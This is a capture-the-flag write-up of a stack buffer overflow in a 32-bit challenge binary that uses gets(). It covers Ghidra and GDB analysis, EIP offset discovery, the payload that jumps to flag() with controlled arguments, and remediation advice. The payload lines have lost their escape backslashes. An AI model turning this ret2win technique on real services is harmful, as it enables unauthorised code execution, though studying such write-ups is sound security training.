You Know Writeup

You Know Writeup


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You Know

Buffer overflow and local variable control



July 1, 2021

0xd4y Writeups




Table of Contents

Executive Summary        2

Attack Narrative        3

Binary Analysis        3

Behavior        3

Ghidra        3

GDB        4

Constructing Exploit        5

EIP Offset        5

Flag() Debug        6

Exploit        12

Conclusion        15

Executive Summary

The binary in question was provided within a zip file. The source code of the program was not given, and analysis was performed using Ghidra for static analysis and GDB for dynamic analysis. Due to the usage of the vulnerable gets() function which fails to perform boundary checks, the program is vulnerable to buffer overflow exploits.

Attack Narrative

The IP and port on which the vulnerable binary runs is given:




Other than this information, no other data is provided.

Binary Analysis

Before attempting to execute the binary, is it essential to first analyze how it works.


Upon executing the binary, the user is prompted with an input:

└──╼ $./vuln  
You know who are 0xDiablos:  

Whatever string the user inputs, the same input gets printed back out. To analyze how this binary works, tools such as GDB[1] (for dynamic analysis) and Ghidra[2] (for static analysis) are used throughout this report.


Many different programs can be used for static analysis, however Ghidra, a tool created by the NSA, is utilized throughout this report because of its capability to translate assembly code into C code for easier analysis. Looking at the output of Ghidra, the following three functions are found:

Within main() the string You know who are 0xDiablos: is printed out before the vuln() function is executed. This function allocates 180 bytes to the buffer local_bc before the vulnerable gets() function is executed with local_bc as the argument. The gets() function is a deprecated function within C due to its inability to perform boundary checks on the user input. The manual for the function states to “Never use this function”[3].

The third function of the binary, namely flag(), was not called by either main() or vuln(). The flag() function checks if a file flag.txt exists. If it does, then it performs an if statement in which it compares the param_1 and param_2 to certain hex values. On condition that this if statement is true, the contents of flag.txt are read out.


Analysing this function through GDB helps in dissecting what the program is doing on the assembly level:

0x08049246 <+100>:   cmp    DWORD PTR [ebp+0x8],0xdeadbeef                          
0x0804924d <+107>:   jne    0x8049269 <flag+135>                                    
0x0804924f <+109>:   cmp    DWORD PTR [ebp+0xc],0xc0ded00d

The aforementioned if statement compares the value of the base pointer + 8 to 0xdeadbeef and the base pointer + 12 to 0xc0ded00d. Therefore, a successful exploit will constitute the control of the foregoing base pointer addresses along with the overwriting of the EIP register to point to the flag() function.

Constructing Exploit

EIP Offset

The offset of the EIP register overwrite must first be determined. Within GDB, in order to provide an input to a program which prompts the user for a string, the desired string must first be echoed into a file. The contents of this file can then be run within the debugger. Hence, using the cyclic function, a pattern of 200 bytes was echoed into a file called eip_overwrite as follows:

└──╼ $cyclic 200 > eip_overwrite

The contents of this file are then piped into the program with r < eip_overwrite:

└──╼ $gdb -q ./vuln  
pwndbg: loaded 196 commands. Type pwndbg [filter] for a list.pwndbg: created $rebase, $ida gdb functions (can be used with print/break)  
Reading symbols from ./vuln...                                                          
(No debugging symbols found in ./vuln)                                                                                                                                        
pwndbg> r < eip_overwrite  
Starting program: /home/0xd4y/business/hackthebox/challenges/pwn/easy/you_know/vuln < eip_overwrite  
You know who are 0xDiablos:  
Program received signal SIGSEGV, Segmentation fault.  
0x62616177 in ?? ()          LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA  
────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────────────────────────────EAX  0xc9                EBX  0x62616175 ('uaab')  
ECX  0xffffffffEDX  0xffffffffEDI  0xf7fa6000 (_GLOBAL_OFFSET_TABLE_) ◂-- insb   byte ptr es:[edi], dx /* 0x1e4d6c */ESI  0xf7fa6000 (_GLOBAL_OFFSET_TABLE_) ◂-- insb   byte ptr es:[edi], dx /* 0x1e4d6c */EBP  0x62616176 ('vaab')  
ESP  0xffffd020 ◂-- 'xaabyaab'  
EIP  0x62616177 ('waab')  
─────────────────────────────────────────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────────────────────────────────────────  
Invalid address 0x62616177

The EIP register was successfully overwritten, and the offset can now be calculated with cyclic -l 0x62616177:

pwndbg> cyclic -l 0x62616177  

Thus, 188 bytes can be passed into the buffer before the EIP register is overwritten.

Flag() Debug

With the EIP register successfully overwritten, the next step is to control it such that it points to the flag() function. Before determining where this function lies in memory, it is imperative to first establish that this binary is in little endian format:

└──╼ $file vulnvuln: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/, BuildID[sha1]=ab7f19bb67c16ae453d4959fba4e6841d930a6dd, for GNU/Linux 3.2.0, not stripped

After finding out that this binary is an LSB executable, the next step is to discover where flag() is in memory. This can be done with the info functions command within GDB:

pwndbg> info functions  
All defined functions:  
Non-debugging symbols:  
0x08049000  _init  
0x08049030  printf@plt  
0x08049040  gets@plt  
0x08049050  fgets@plt  
0x08049060  getegid@plt  
0x08049070  puts@plt  
0x08049080  exit@plt  
0x08049090  __libc_start_main@plt  
0x080490a0  setvbuf@plt  
0x080490b0  fopen@plt  
0x080490c0  setresgid@plt  
0x080490d0  _start  
0x08049110  _dl_relocate_static_pie  
0x08049120  __x86.get_pc_thunk.bx  
0x08049130  deregister_tm_clones  
0x08049170  register_tm_clones  
0x080491b0  __do_global_dtors_aux  
0x080491e0  frame_dummy  
0x080491e2  flag  
0x08049272  vuln  
0x080492b1  main  
0x08049330  __libc_csu_init  
0x08049390  __libc_csu_fini  
0x08049391  __x86.get_pc_thunk.bp  
0x08049398  _fini

Note the functions of interest which are in red

Flag() is at 0x080491e2 which in little endian byte format is xe2x91x04x08. Therefore, upon inputting a string of 188 bytes followed by the address of the flag, the program should call the function:

└──╼ $python -c "print 'A'*188 + 'xe2x91x04x08'" > eip_flag

Before running this malicious string, recall that the program exits if the file flag.txt does not exist. This file was simply created using the touch command as follows:

└──╼ $touch flag.txt

The comparison within the function in question starts at flag+100 (or 0x08049246). This can be found using the disass (short for disassemble) command within GDB:

pwndbg> disass flag                                                                                                                                                    
Dump of assembler code for function flag:                                              
  0x080491e2 <+0>:     push   ebp                                                     0x080491e3 <+1>:     mov    ebp,esp                                                 0x080491e5 <+3>:     push   ebx                                                     0x080491e6 <+4>:     sub    esp,0x54  
  0x080491e9 <+7>:     call   0x8049120 <__x86.get_pc_thunk.bx>  
  0x080491ee <+12>:    add    ebx,0x2e12  
  0x080491f4 <+18>:    sub    esp,0x8  
  0x080491f7 <+21>:    lea    eax,[ebx-0x1ff8]  
  0x080491fd <+27>:    push   eax  0x080491fe <+28>:    lea    eax,[ebx-0x1ff6]  
  0x08049204 <+34>:    push   eax  0x08049205 <+35>:    call   0x80490b0 <fopen@plt>  
  0x0804920a <+40>:    add    esp,0x10  
  0x0804920d <+43>:    mov    DWORD PTR [ebp-0xc],eax  0x08049210 <+46>:    cmp    DWORD PTR [ebp-0xc],0x0  
  0x08049214 <+50>:    jne    0x8049232 <flag+80>  
  0x08049216 <+52>:    sub    esp,0xc  
  0x08049219 <+55>:    lea    eax,[ebx-0x1fec]  
  0x0804921f <+61>:    push   eax  0x08049220 <+62>:    call   0x8049070 <puts@plt>  
  0x08049225 <+67>:    add    esp,0x10  
  0x08049228 <+70>:    sub    esp,0xc  
  0x0804922b <+73>:    push   0x0  
  0x0804922d <+75>:    call   0x8049080 <exit@plt>  
  0x08049232 <+80>:    sub    esp,0x4  
  0x08049235 <+83>:    push   DWORD PTR [ebp-0xc]  
  0x08049238 <+86>:    push   0x40  
  0x0804923a <+88>:    lea    eax,[ebp-0x4c]  
  0x0804923d <+91>:    push   eax  0x0804923e <+92>:    call   0x8049050 <fgets@plt>  
  0x08049243 <+97>:    add    esp,0x10  
  0x08049246 <+100>:   cmp    DWORD PTR [ebp+0x8],0xdeadbeef  
  0x0804924d <+107>:   jne    0x8049269 <flag+135>  
  0x0804924f <+109>:   cmp    DWORD PTR [ebp+0xc],0xc0ded00d  
  0x08049256 <+116>:   jne    0x804926c <flag+138>  
  0x08049258 <+118>:   sub    esp,0xc  
  0x0804925b <+121>:   lea    eax,[ebp-0x4c]  
  0x0804925e <+124>:   push   eax  0x0804925f <+125>:   call   0x8049030 <printf@plt>  
  0x08049264 <+130>:   add    esp,0x10  
  0x08049267 <+133>:   jmp    0x804926d <flag+139>  
  0x08049269 <+135>:   nop  0x0804926a <+136>:   jmp    0x804926d <flag+139>  
  0x0804926c <+138>:   nop  0x0804926d <+139>:   mov    ebx,DWORD PTR [ebp-0x4]  
  0x08049270 <+142>:   leave   0x08049271 <+143>:   ret   End of assembler dump.

Prior to piping the contents of eip_flag into the binary, a breakpoint was set at 0x08049246 to allow further investigation into the EBP register.

pwndbg> b *0x08049246                                                                  
Breakpoint 1 at 0x8049246

Finally, the malicious string can be run:

pwndbg> r < eip_flag  
Starting program: /home/0xd4y/business/hackthebox/challenges/pwn/easy/you_know/vuln < eip_flag  
You know who are 0xDiablos:  
Breakpoint 1, 0x08049246 in flag ()LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA  
────────────────────────────────────[ REGISTERS ]─────────────────────────────────────EAX  0x0EBX  0x804c000 (_GLOBAL_OFFSET_TABLE_) --▸ 0x804bf10 (_DYNAMIC) ◂-- add    dword ptr [eax], eax  
ECX  0x0EDX  0xfbad2498EDI  0xf7fa6000 (_GLOBAL_OFFSET_TABLE_) ◂-- insb   byte ptr es:[edi], dx /* 0x1e4d6c */ESI  0xf7fa6000 (_GLOBAL_OFFSET_TABLE_) ◂-- insb   byte ptr es:[edi], dx /* 0x1e4d6c */EBP  0xffffd01c ◂-- 'AAAA'  
ESP  0xffffcfc4 ◂-- 0x41414141 ('AAAA')  
EIP  0x8049246 (flag+100) ◂-- cmp    dword ptr [ebp + 8], 0xdeadbeef

As expected, the breakpoint at flag+100 was hit. Looking at ebp+0x8, it can be observed that it was not overwritten:

pwndbg> x/x $ebp+0x8  
0xffffd024:     0xffffd0f4

Upon looking at the first 16 bytes of the EBP register, an interesting circumstance can be noticed:

pwndbg> x/4x $ebp  
0xffffd01c:     0x41414141      0x00000000      0xffffd0f4      0xffffd0fc

At exactly $ebp, the junk bytes that are present in the malicious string can be seen. Following that is a succession of eight zeroes followed by the value of $ebp+0x8 and $ebp+0xc. This succession of zeroes is particularly interesting as it is not clear what it relates to. Modifying the malicious string by adding four B’s to the end of it and piping it into the program ,reveals an interesting behavior within the binary:

└──╼ $python -c "print 'A'*188 + 'xe2x91x04x08'+'BBBB'" > eip_flag

pwndbg> r < eip_flag                                                                    
Starting program: /home/0xd4y/business/hackthebox/challenges/pwn/easy/you_know/vuln < eip_flag  
You know who are 0xDiablos:                                                            
Breakpoint 1, 0x08049246 in flag ()        LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA                                      
────────────────────────────────────[ REGISTERS ]─────────────────────────────────────EAX  0x0                                  EBX  0x804c000 (_GLOBAL_OFFSET_TABLE_) --▸ 0x804bf10 (_DYNAMIC) ◂-- add    dword ptr [eax], eax  
ECX  0x0                                  EDX  0xfbad2498                          EDI  0xf7fa6000 (_GLOBAL_OFFSET_TABLE_) ◂-- insb   byte ptr es:[edi], dx /* 0x1e4d6c */ESI  0xf7fa6000 (_GLOBAL_OFFSET_TABLE_) ◂-- insb   byte ptr es:[edi], dx /* 0x1e4d6c */EBP  0xffffd01c ◂-- 'AAAABBBB'             ESP  0xffffcfc4 ◂-- 0x41414141 ('AAAA')    EIP  0x8049246 (flag+100) ◂-- cmp    dword ptr [ebp + 8], 0xdeadbeef

Now, looking at the EBP register, observe the value at $ebp+0x4:

pwndbg> x/4x $ebp  
0xffffd01c:     0x41414141      0x42424242      0xffffd000      0xffffd0fc

Thus, $ebp+0x8 and $ebp+0xc can now successfully be controlled by appending 0xdeadbeef and 0xc0ded00d in little endian byte format (xefxbexadxde and x0dxd0xdexc0 respectively).


Therefore, the final exploit will take the following form:





ADDRESS_OF_FLAG = xe2x91x04x08

DEADBEEF = xefxbexadxde

C0DED00D = x0dxd0xdexc0

Piping the contents of eip_flag into the binary and checking the EBP register, it can be seen that ebp+0x8 and ebp+0xc were successfully controlled.

└──╼ $python -c "print 'A'*188 + 'xe2x91x04x08'+'BBBB'+'xefxbexadxde'+'x0dxd0xdexc0'" > eip_flag  
pwndbg> r < eip_flag                                                                                                                                                  [4/579]  
Starting program: /home/0xd4y/business/hackthebox/challenges/pwn/easy/you_know/vuln < eip_flag                                                                                
You know who are 0xDiablos:                                                                                                                                                    
Breakpoint 1, 0x08049246 in flag ()        LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA                                      
────────────────────────────────────[ REGISTERS ]─────────────────────────────────────EAX  0x0                                  EBX  0x804c000 (_GLOBAL_OFFSET_TABLE_) --▸ 0x804bf10 (_DYNAMIC) ◂-- add    dword ptr [eax], eax  
ECX  0x0                                  EDX  0xfbad2498                          EDI  0xf7fa6000 (_GLOBAL_OFFSET_TABLE_) ◂-- insb   byte ptr es:[edi], dx /* 0x1e4d6c */ESI  0xf7fa6000 (_GLOBAL_OFFSET_TABLE_) ◂-- insb   byte ptr es:[edi], dx /* 0x1e4d6c */EBP  0xffffd01c ◂-- 0x41414141 ('AAAA')    ESP  0xffffcfc4 ◂-- 0x41414141 ('AAAA')    EIP  0x8049246 (flag+100) ◂-- cmp    dword ptr [ebp + 8], 0xdeadbeef                    
───────────────────────────────────[ DISASM ]───────────────────────────────────        
► 0x8049246 <flag+100>    cmp    dword ptr [ebp + 8], 0xdeadbeef                      
  0x804924d <flag+107>    jne    flag+135 <flag+135>                                  
  0x804924f <flag+109>    cmp    dword ptr [ebp + 0xc], 0xc0ded00d                    
  0x8049256 <flag+116>    jne    flag+138 <flag+138>                                  
  0x8049258 <flag+118>    sub    esp, 0xc                                              
  0x804925b <flag+121>    lea    eax, [ebp - 0x4c]                                    
  0x804925e <flag+124>    push   eax       0x804925f <flag+125>    call   printf@plt <printf@plt>                              
  0x8049264 <flag+130>    add    esp, 0x10                                            
  0x8049267 <flag+133>    jmp    flag+139 <flag+139>                                  
  0x8049269 <flag+135>    nop             ───────────────────────────────────[ STACK ]────────────────────────────────────        
00:0000│ esp 0xffffcfc4 ◂-- 0x41414141 ('AAAA')                                          
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────        
► f 0 0x8049246 flag+100                    
  f 1 0x42424242                            
  f 2 0xdeadbeef                            
  f 3 0xc0ded00d                            
  f 4    0x300                              

pwndbg> x/4x $ebp                          

0xffffd01c:     0x41414141      0x42424242      0xdeadbeef      0xc0ded00d

Consequently, the if statement discussed earlier in the Ghidra section will run true. After piping the malicious string into netcat, the flag.txt file located within the server is printed out.

└──╼ $nc 31449 < eip_flag  
└──╼ $


The binary in question was vulnerable to a buffer overflow attack due to the lack of boundary checks performed on user input. The deprecated gets() function was used within the binary despite the security warnings that are associated with it. As a result, memory could be overwritten resulting in behavior that the binary was not written to perform. The following remediations should be strongly considered:

  • Never use the deprecated gets() function

  • Usage of this function creates the possibility for security risks that could allow malicious actors to run arbitrary code

  • Use the secure fgets() function

  • This function reads user input until a newline character is found or until the buffer gets filled

The aforementioned remediations should be observed as soon as possible. Until this binary is patched, the service running on port 31449 should be disabled.


